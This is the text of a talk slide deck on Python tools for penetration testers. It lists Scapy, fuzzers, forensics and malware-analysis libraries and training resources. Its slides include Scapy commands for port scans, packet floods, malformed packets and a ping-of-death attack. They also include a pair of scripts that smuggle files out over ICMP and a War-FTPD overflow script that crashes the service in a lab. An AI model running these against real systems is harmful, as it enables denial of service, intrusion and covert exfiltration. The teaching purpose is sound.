  • 28. Python’s uses – Networking • Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests) • Mallory, man-in-the-middle proxy for testing • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist • pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection • Dirtbags py-pcap: read pcap files without libpcap • flowgrep: grep through packet payloads using regular expressions • httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries http://www.dirk-loss.de/python-tools.htm
  • 29. Scapy www.secdev.org/projects/scapy/ • Packet creation • Classic attacks • Read PCAP files • Malformed packets • Create graphical dumps • Ping of death • Must have appropriate supporting • Nestea attack tools installed • ARP cache poisoning • Fuzzing • Scans • Send and receive packets • SYN scan • TCP traceroute (can do graphical dump • ACK scan as well) • XMAS scan • Sniffing • IP scan • Send and receive files through • TCP port scan alternate data channels (ICMP) • IKE scan • Ping • Advanced traceroute • ARP ping • TCP SYN traceroute • ICMP ping • UDP traceroute • TCP ping • DNS traceroute • UDP ping • VLAN hopping • Wireless frame injection • Wireless sniffing • OS Fingerprinting • Firewalking
  • 30. Scapy • Packet creation • Stacking layers
  • 31. Scapy • Read PCAP files • A=rdpcap(“<directory where PCAP file is>/<pcap file>”) • Create graphical dumps • A[<packet number>].psdump(“<location to store .eps file>, layer_shift=1)
  • 33. Scapy Send packets • send(IP(dst=“192.168.1.1")/ICMP()) • sendp(Ether()/IP(dst=" 192.168.1.1 ",ttl=(1,4)), iface="eth0") • sendp(rdpcap("/tmp/pcapfile"))
  • 34. Scapy
  • 35. Scapy sendp("I’m travelling on Ethernet", iface="eth0", loop=1, inter=0.2)
  • 36. Scapy Send and receive packets • p=sr1(IP(dst="www.slashdot.org") /ICMP()/"XXXXXXXXXXX") • p=sr1(IP(dst="www.slashdot.org") /ICMP()/" ABCDEFGHIJ ") • p.show()
  • 37. Scapy Send and receive packets • p=sr1(IP(dst="www.slashdot.org")/ICMP()/“ABCDEFGHIJ")
  • 38. Scapy Send and receive packets • sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23])) • sr(IP(dst=" 192.168.1.10 ")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)
  • 39. Scapy Fuzzing • send(IP(dst=“192.168.1.10")/fuzz(ICMP()/NTP(version=4)),loop=1) • send(IP(dst="192.168.1.10")/fuzz(TCP()/NTP(version=4)),loop=1)
  • 40. TCP traceroute • res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com ],dport=[80,443],maxttl=20,retry=-2) " Scapy
  • 41. Scapy
  • 42. Scapy Sniffing • sniff(filter="icmp and host 66.35.250.151", count=2) • a=_ • a.nsummary() • a[1] • sniff(iface="eth0", prn=lambda x: x.show())
  • 43. Scapy
  • 44. SYN scan • sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S")) Scapy • sr(IP(dst="192.168.1.1")/TCP(sport=666,dport=(440,443),flags="S")) • sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(),dport=[440,441,442,443],flags="S")) • ans.summary() • ans.summary( lambda(s,r): r.sprintf("%TCP.sport% t %TCP.flags%") )
  • 45. Scapy Classic attacks • Malformed packets • send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP()) • Ping of death • send( fragment(IP(dst=" 192.168.1.10 ")/ICMP()/("X" * 60000)) )
  • 46. • send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP()) Scapy • send( fragment(IP(dst=" 192.168.1.10 ")/ICMP()/("X" * 60000)) )
  • 47. Scapy
  • 48. Scapy To send packets via ICMP #!/usr/bin/python import sys from scapy.all import * conf.verb = 0 f = open(sys.argv[1]) data = f.read() f.close() host = sys.argv[2] print "Data size is %d " %len(data) i=0 while i<len(data): pack = IP(dst=host)/ICMP(type="echo-reply")/data[i:i+32] send(pack) i = i+32 print "Data sent"
  • 49. Scapy To receive packets via ICMP #!/usr/bin/python import sys from scapy.all import * conf.verb=0 f=open(sys.argv[1],"w") host=sys.argv[2] count = int(sys.argv[3]) filter="icmp and host " + host print "sniffing with filter (%s) for %d bytes" % (filter,int(count)) packets = sniff(count,filter=filter) for p in packets: f.write(p['Raw'].load) f.close() print "Data received"
  • 50. Python’s uses – Debugging and Reverse Engineering • Immunity Debugger: scriptable GUI and command line debugger • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro • pefile: read and work with Portable Executable (aka PE) files • pydasm: Python interface to the libdasm x86 disassembling library • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory • diStorm64: disassembler library for AMD64, licensed under the BSD license • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it (mirror) • Androguard: reverse engineering and analysis of Android applications http://www.dirk-loss.de/python-tools.htm
  • 51. Coding for Pentesters - Exploitation scripting
  • 52. Coding for Pentesters – Exploitation scripting Building Exploits with Python 1. Windows XP SP0 2. War-FTPD v 1.65 3. Immunity Debugger
  • 53. Coding for Pentesters – Exploitation scripting Step 1 – Open WarftpD with Immunity
  • 54. Coding for Pentesters – Exploitation scripting Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.
  • 55. Coding for Pentesters – Exploitation scripting Step 3 – Build this script and run it…. and enjoy the show #!/usr/bin/python import sys import socket hostname = sys.argv[1] username = "A"*1024 passwd = "anything" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("[-] Connection error!") sys.exit(1) r = sock.recv(1024) print "[+] " + r sock.send("user %srn" %username) r = sock.recv(1024) print "[+] " + r sock.send("pass %srn" %passwd) r = sock.recv(1024) print "[+] " + r sock.close()
  • 56. Coding for Pentesters – Exploitation scripting The connection attempt with the user name of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  • 57. Coding for Pentesters – Exploitation scripting
  • 58. Coding for Pentesters – Exploitation scripting Step 4 - WarFTPD crashes!
  • 59. Python’s uses – Malware analysis • torwget.py: Multi-platform TOR-enabled URL • clamav_to_yara.py: Convert ClamAV antivirus signatures to YARA rules • peid_to_yara.py: Convert PEiD packer signatures to YARA rules • av_multiscan.py: Script to implement your own antivirus multi- scanner • pescanner.py: Detect malicious PE file attributes • ssdeep_procs.py: Detect self-mutating code on live Windows systems using ssdeep • avsubmit.py: Command-line interface to VirusTotal, ThreatExpert, Jotti, and NoVirusThanks • dbmgr.py: Malware artifacts database manager • artifactscanner.py: Application to scan live Windows systems for artifacts (files, Registry keys, mutexes) left by malware • mapper.py: Create static PNG images of IP addresses plotted on a map using GeoIP • googlegeoip.py: Create dynamic/interactive geographical maps of IP addresses using Google charts • sc_distorm.py: Script to produce disassemblies (via DiStorm) of shellcode and optionally apply an XOR mask • vmauto.py: Python class for automating malware execution in VirtualBox and VMware guests • mybox.py: Sample automation script for VirtualBox based on vmauto.py
  • 60. Python’s uses – Malware analysis • myvmware.py: Sample automation script for VMware based on vmauto.py • analysis.py: Python class for building sandboxes with support for analyzing network traffic, packet captures, and memory • scd.py: Immunity Debugger PyCommand for finding shellcode in arbitrary binary files • findhooks.py: Immunity Debugger PyCommand for finding Inline-style user mode API hooks • pymon.py: WinAppDbg plug-in for monitoring API calls, alerting on suspicious flags/parameters and producing an HTML report • xortools.py: Python library for encoding/decoding XOR, including brute force methods and automated YARA signature generation • trickimprec.py: Immunity Debugger PyCommand for assistance when rebuilding import tables with Import REconstructor • kraken.py: Immunity Debugger PyCommand for cracking Kraken’s Domain Generation Algorithm (DGA) • sbstrings.py: Immunity Debugger PyCommand for decrypting Silent Banker strings • install_svc.py: Python script for installing a service DLL and supplying optional arguments to the service • dll2exe.py: Python script for converting a DLL into a standalone executable • windbg_to_ida.py: Python script to convert WinDbg output into data that can be imported into IDA
  • 61. Python’s uses – Malware analysis Practical Malware Analysis • FakeNet - http://practicalmalwareanalysis.com/
  • 62. Python’s uses – Malware analysis • Cuckoo Sandbox - a malware analysis system used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. • yara-python: identify and classify malware samples • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content • pyClamAV: add virus detection capabilities to your Python software • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities • phoneyc: pure Python honeyclient implementation http://www.dirk-loss.de/python-tools.htm
  • 63. Python’s uses – Fuzzing • Sickfuzz: a fuzzer made out of several custom .spk files and a python script to wrap them up, including some tshark support and other features. • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing • antiparser: fuzz testing and fault injection API • TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer) • FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns • Fuzzbox: multi-codec media fuzzer • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms • WSBang: perform automated security testing of SOAP based web services • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano • Fusil: Python library used to write fuzzing programs http://www.dirk-loss.de/python-tools.htm
  • 64. Python’s uses – Fuzzing Sickfuzz
  • 65. Python’s uses – Web • Scrapy: a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages. It can be used for a wide range of purposes, from data mining to monitoring and automated testing. • ProxMon: processes proxy logs and reports discovered issues • Twill: browse the Web from a command-line interface. Supports automated Web testing • Windmill: web testing tool designed to let you painlessly automate and debug your web application • FunkLoad: functional and load web tester • spynner: Programmatic web browsing module for Python with Javascript/AJAX support • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions http://www.dirk-loss.de/python-tools.htm
  • 66. Python’s uses – Web http://snippets.scrapy.org/snippets/7/
  • 67. Python’s uses – Forensics • Volatility: extract digital artifacts from volatile memory (RAM) samples • SandMan: read the hibernation file, regardless of Windows version • LibForensics: library for developing digital forensics applications • TrIDLib, identify file types from their binary signatures. Now includes Python binding • aft: Android forensic toolkit http://www.dirk-loss.de/python-tools.htm
  • 68. Python’s uses – Forensics Volatility
  • 69. Python’s uses – Miscellaneous • InlineEgg: toolbox of classes for writing small assembly programs in Python • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging • RevHosts: enumerate virtual hosts for a given IP address • simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools (abandoned?) • Hachoir: view and edit a binary stream field by field Other useful libraries and tools • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system • Beautiful Soup: HTML parser optimized for screen-scraping • Mayavi: 3D scientific data visualization and plotting • Twisted: event-driven networking engine • Suds: lightweight SOAP client for consuming Web Services • M2Crypto: most complete OpenSSL wrapper • NetworkX: graph library (edges, nodes) • pyparsing: general parsing module • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python • Pexpect: control and automate other programs, similar to Don Libes `Expect` system • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython • PyQt and PySide: Python bindings for the Qt application framework and GUI library http://www.dirk-loss.de/python-tools.htm
  • 70. Coding for Penetration Testers book Script Function Learned Webcheck_v1.py Monitor web server – verify it 1. Script arguments remains up 2. Connect to web server and run a GET request Webcheck_v2.py Monitor web server – verify it 1. Alternate script arguments method remains up (default to port 80) Subnetcalc.py Calculate subnet mask, broadcast 1. Parse out values programmatically address, network range, and 2. Math functions with variables gateway from IP/CIDR 3. Displaying results 4. Using FOR loops Pass.py Determines if users are using the 1. Use the crypt module original default assigned password Robotparser.py Retrieve the paths from the 1. Parse the robots.txt file with the built robotparser module robot.txt 2. Nesting FOR loops root_check.py Checks to see what permissions 1. Using IF and ELIF conditional statements logged in account has (normal 2. Use OS module to make system calls user, root or system account) Readshadow.py Checks to see if you have 1. Use OS module to make system calls permission to read /etc/shadow 2. Tests permissions on files to see if current credentials can read file Network_socket.py Connect to website, pull contents 1. Network socket creation (hard coded) 2. Spaces will bite you in the ass where you least expect it.
  • 71. Coding for Penetration Testers book Script Function Learned network_socket_argum Connect to website, pull contents 1. Network socket creation ent.py (site specified by argument) 2. Spaces will bite you in the ass where you least expect it. Server_connect.py Once a connection is made, send 1. Network socket creation back a string 2. Allow incoming connections. receiveICMP.py To receive a file from another 1. Python script using Scapy system via ICMP (in conjunction with sendICMP.py) sendICMP.py To send a file to another system 1. Python script using Scapy via ICMP (in conjunction with receiveICMP.py)
  • 72. Little gems I found Description Function Site Python-nmap It’s a Python library which helps in http://xael.org/norman/python/python- using nmap. nmap/ Python API to the VirtualBox Allowing you to control every http://download.virtualbox.org/virtualbox VM aspect of virtual machine /SDKRef.pdf configuration and execution Py2Exe py2exe is http://www.py2exe.org/ a Python Distutils extension which converts Python scripts into executable Windows programs, able to run without requiring a Python installation. Chrome Various extensions/applications • https://chrome.google.com/webstore/ extensions/applications found in the Chrome Webstore detail/gdiimmpmdoofmahingpgabiikim jgcia <-- Python shell (browser button) • https://chrome.google.com/webstore/ detail/cmlchnlmkdcpelgmkebknjgjgdd ncelc - Python shell (Chrome application) • https://chrome.google.com/webstore/ detail/nckbgikkpbjdliigbhgjfgfcahhona kp <-- Online Python development environment
  • 73. Little gems I found Extra extra credit Description Function Site Tweepy It’s the best working Python http://tweepy.github.com/ library to interface with Twitter (so far)
  • 74. Tweepy • Direct message • Check friends timelines • Create favorites http://talkfast.org/2010/05/31/twitter-from-the-command-line-in-python-using-oauth
  • 75. Tips, tricks, etc. IDE (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments) • Windows • PyScripter • Aptana Studio • IDLE • Ninja • Wing IDE • Linux • IDLE • Geany • Python Toolkit • SPE • ERIC (supposed to have auto-complete of code…) Editors (http://wiki.python.org/moin/PythonEditors) • Windows • Notepad++ • Linux • Gedit • SCiTE
  • 76. Tips, tricks, etc. Shells • DreamPie • Automatic of completion of attributes and file names • History box • Code box • IDLE • Included with Python install • Ipython • PyShell • Guake Other • PythonAnywhere • http://pythonanywhere.com/
  • 77. Tips, tricks, etc. Linux vs. Windows Linux • Linux scripts can be ran via terminal • calling python <script name> • by putting #!/usr/bin/python at the top (path to interpreter) and typing ./<script name> • Common problem on PyScripter (awesome Windows Python IDE)… extra code comments are put at the top, then the #! /usr/bin/python Windows • Windows scripts don’t need the #! but need to have .py associated with Python interepreter. • Scripts can be double clicked or ran from command prompt python <script name> • If the script is double clicked, without having raw_input("Press ENTER to exit") you may not see the output of the script.
  • 78. Portable Python (Windows only) • Portable Python is a Python® programming Tips, tricks, etc. language preconfigured to run directly from any USB storage device, enabling you to have, at any time, a portable programming environment. Just download it, extract to your portable storage device or hard drive and in 10 minutes you are ready to create your next Python® application. • Portable Python 2.7.2.1 package contains following applications/libraries: • PyScripter v2.4.1 • NymPy 1.6.0 • SciPy 0.90 • Matplotlib 1.0.1 • PyWin32 216 • Django 1.3 • PIL 1.1.7 • Py2Exe 0.6.9 • wxPython 2.8.12.0 • Portable Python 3.2.1.1 package contains following applications/libraries (alphabetical order): • NetworkX v1.4 • PySerial 2.5 • PyScripter v2.4.1 • PyWin32 v.216 • RPyC-3.0.7
  • 80. Beginners guides from Python Additional resources • http://wiki.python.org/moin/BeginnersGuide/NonProgrammers • http://wiki.python.org/moin/BeginnersGuide/Programmers Extra tools • http://mashable.com/2007/10/02/python-toolbox/ Online exercises • http://codingbat.com/python • http://homepage.mac.com/s_lott/books/python.html • http://web.archive.org/web/20110625065328/http://diveintopython.org/toc/index.html • http://anh.cs.luc.edu/python/hands-on/ • http://code.google.com/edu/languages/google-python-class/index.html • http://www.cdf.toronto.edu/~csc148h/winter/ • http://www.cdf.toronto.edu/~csc108h/fall/ • http://projecteuler.net/ • http://www.upriss.org.uk/python/PythonCourse.html • http://www.pythonchallenge.com/ • http://learnpythonthehardway.org/ • http://www.awaretek.com/tutorials.html • http://www.checkio.org/ • http://www.pyschools.com/ General learning materials • http://www.py4inf.com/
  • 81. Free online videos Additional resources • http://freevideolectures.com/Course/2512/Python-Programming • http://showmedo.com/videotutorials/python • http://www.python.org/doc/av/ • http://thenewboston.org/list.php?cat=36 Online books • http://en.wikibooks.org/wiki/Python_Programming Online interactive tutorial/interpreter • http://www.trypython.org • http://www.learnpython.org/ • https://languageshells.appspot.com/ Forums • http://www.python-forum.org • http://stackoverflow.com/questions/tagged/python • http://www.daniweb.com/software-development/python/114 Module/package repositories • http://pypi.python.org/pypi The Python Package Index is a repository of software for the Python programming language. There are currently 17409 packages here. • http://code.activestate.com/recipes/ The ActiveState Code Recipes contains 3850 snippets to learn from and use. Python tools for penetration testers • http://www.dirk-loss.de/python-tools.htm
  • 82. Training • SecurityTube Python Scripting Expert Additional resources • http://securitytube-training.com/certifications/securitytube- python-scripting-expert/?id=main • Module 1: Python Scripting – Language Essentials • Module 2: System Programming and Security • Module 3: Network Security Programming – Sniffers and Packet Injectors • Module 4: Attacking Web Applications • Module 5: Exploitation Techniques • Module 6: Malware Analysis and Reverse Engineering • Module 7: Attack Task Automation • Module 8: Further Study and Roadmap • Module 9: Exam Pattern and Mock Exam • PYTHON TRAINING FOR SECURITY PROFESSIONALS • http://www.trainace.com/courses/python/ • Log Parsing with Python • Pcap Parsing with Python • Network Attack with Python • Web Application Attack with Python • Malware Analysis with Python • Exploit Development with Python
  • 83. All the scripts Category Script CSAW Crypto Redux – Challenge 1 to 5 Extra credit Coding for Penetration Testers – part 1 Coding for Penetration Testers – part 2 Coding for Penetration Testers – part 3 Extra extra credit
  • 84. Etc. Antigravity • When you open up ModulesDocs and click on antigravity module or from IDLE run import antigravity, a web browser opens to the XKCD cartoon at the beginning of this slide deck. Zen of Python • To start the path of finding Zen of Python, remember these two key words… IMPORT THIS . • From an IDE (IDLE) or a Python shell, run import this and the Zen of Python will be revealed.
  • 85. Etc.
  • 87. Questions? Keith Dixon @Tazdrumm3r #misec – Tazdrumm3r tazdrummer@gmail.com http://tazdrumm3r.wordpress.com